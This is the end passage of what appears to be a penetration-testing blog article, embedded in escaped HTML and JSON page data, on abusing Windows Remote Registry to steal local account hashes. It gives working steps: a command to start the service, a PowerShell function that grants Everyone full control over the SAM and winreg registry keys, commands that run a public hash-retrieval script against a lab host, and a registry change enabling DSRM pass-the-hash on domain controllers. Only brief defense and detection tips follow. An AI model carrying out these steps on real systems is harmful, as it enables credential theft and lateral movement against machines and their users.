refer to the previous article 'Penetration Techniques - Obtaining Local User Hashes via the SAM Database'.\u003C\u002Fp>\u003Cp>The brief process is as follows:\u003C\u002Fp>\u003Col>\u003Cli>Read the contents of the keys JD, Skew1, GBG, and Data under the registry entry HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa, and concatenate them to form the syskey.\u003C\u002Fli>\u003Cli>Read the contents of the F and V items for each user under the registry entry HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users, and use the syskey to perform a series of decryptions.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Therefore, if remote computer registry files can be accessed, the hashes of all local users on the remote computer can be recovered.\u003C\u002Fp>\u003Cp>In exploitation, note that the default access permission for HKLM\\SAM\\SAM is 'NT AUTHORITY\\SYSTEM' (Administrator does not have access). To read remotely, ACLs must be added to this registry entry and its subkeys.\u003C\u002Fp>\u003Cp>The exploitation process is as follows:\u003C\u002Fp>\u003Ch3>1. Start the Remote Registry service\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>net start remoteregistry\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Add ACL (Access Control List)\u003C\u002Fh3>\u003Cp>The registry locations are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg\u003C\u002Fli>\u003Cli>HKEY_LOCAL_MACHINE\\SAM\\SAM and its subkeys\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Add full access permissions for the user Everyone to the above registry entries. The PowerShell code is as follows:\u003C\u002Fp>\u003Cp>(Execute with System privileges on 192.168.112.128)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>function Add-RegistryACL{\u003Cbr>[CmdletBinding()]\u003Cbr>Param (\u003Cbr>[Parameter(Mandatory = $True)]\u003Cbr>[String]\u003Cbr>[ValidateNotNullOrEmpty()]\u003Cbr>$Path\u003Cbr>)\u003Cbr>$acl = Get-Acl -Path $Path\u003Cbr>$person = [System.Security.Principal.NTAccount]\"Everyone\"\u003Cbr>$access = [System.Security.AccessControl.RegistryRights]\"FullControl\"\u003Cbr>$inheritance = [System.Security.AccessControl.InheritanceFlags]\"ObjectInherit,ContainerInherit\"\u003Cbr>$propagation = [System.Security.AccessControl.PropagationFlags]\"None\"\u003Cbr>$type = [System.Security.AccessControl.AccessControlType]\"Allow\"\u003Cbr>$rule = New-Object System.Security.AccessControl.RegistryAccessRule( `\u003Cbr>$person,$access,$inheritance,$propagation,$type)\u003Cbr>$acl.AddAccessRule($rule)\u003Cbr>Set-Acl $Path $acl\u003Cbr>}\u003Cbr>Add-RegistryACL -Path 'HKLM:\\SAM\\SAM'\u003Cbr>Add-RegistryACL -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurePipeServers\\winreg'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>3. Decrypt and restore local user hashes on remote computers using PowerShell\u003C\u002Fh3>\u003Cp>Use the following script:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FHarmJ0y\u002FDAMP\u002Fblob\u002Fmaster\u002FRemoteHashRetrieval.ps1\u003C\u002Fp>\u003Cp>Commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import-module .\\RemoteHashRetrieval.ps1\u003Cbr>Get-RemoteLocalAccountHash -ComputerName '192.168.112.128'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017417389_5_8d7c7cee11-1.jpeg\">\u003C\u002Fp>\u003Cp>Successfully obtained local user hashes on 192.168.112.128\u003C\u002Fp>\u003Ch3>Supplement 1:\u003C\u002Fh3>\u003Cp>Use PowerShell to decrypt and restore the hashes of all local users. Code reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FEmpireProject\u002FEmpire\u002Fblob\u002Fmaster\u002Fdata\u002Fmodule_source\u002Fcredentials\u002FInvoke-PowerDump.ps1\u003C\u002Fp>\u003Ch3>Supplement 2:\u003C\u002Fh3>\u003Cp>For domain controllers, remotely export the local user hashes of the domain controller. If you want to use pass the hash within the domain, you also need to modify the domain controller's registry to allow remote access for the DSRM account:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa \u002Fv DSRMAdminLogonBehavior \u002Ft REG_DWORD \u002Fd 2\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Suggestions for Defense and Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Defense:\u003C\u002Fp>\u003Col>\u003Cli>If the Remote Registry service is not needed, it is recommended to disable it.\u003C\u002Fli>\u003C\u002Fol>\u003Cp>Detection:\u003C\u002Fp>\u003Col>\u003Cli>If remote computer registry files are accessible, there are many methods that can be exploited. For detection, monitoring registry operations on critical servers is advisable.\u003C\u002Fli>\u003C\u002Fol>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces two backdoor exploitation methods for Remote Registry in Windows: remote program execution and obtaining user hashes from SAM files.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",893,"Onedaysec",5,"published","2026-02-02T07:38:21.454Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Remote Registry Exploitation in Windows: Penetration Techniques & Backdoor Methods","Remote Registry, Windows penetration, backdoor exploitation, registry hacking, GPO exploitation, harmj0y, Active Directory, image hijacking, taskhost.exe, PowerShell ACL",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],628,627,625,624,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.295Z","2026-07-23T16:01:52.158Z","draft","2026-07-23T16:13:50.922Z","2026-07-23T16:13:50.921Z"]